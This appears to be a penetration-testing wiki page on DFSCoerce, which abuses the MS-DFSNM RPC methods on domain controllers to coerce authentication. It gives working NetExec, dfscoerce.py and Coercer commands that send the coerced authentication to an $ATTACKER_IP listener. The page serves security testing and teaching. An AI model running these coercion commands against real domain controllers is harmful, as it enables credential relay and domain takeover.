MS-DFSNM abuse (DFSCoerce)

Theory

MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com). That interface is available through the \pipe\netdfs SMB named pipe.

In mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers.

Practice

NetExec (Python) can be used to check if the target is vulnerable to DFSCoerce.

netexec smb <TARGET> -u <USER> -p <PASSWORD> -M dfscoerce

DFSCoerce

The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.

dfscoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

Coercer

Another alternative is to use the Coercer tool (python) as follow.

# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-DFSNM -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name NetrDfsRemoveStdRoot -l $ATTACKER_IP -t $TARGET_IP

Resources

Last updated 10 months ago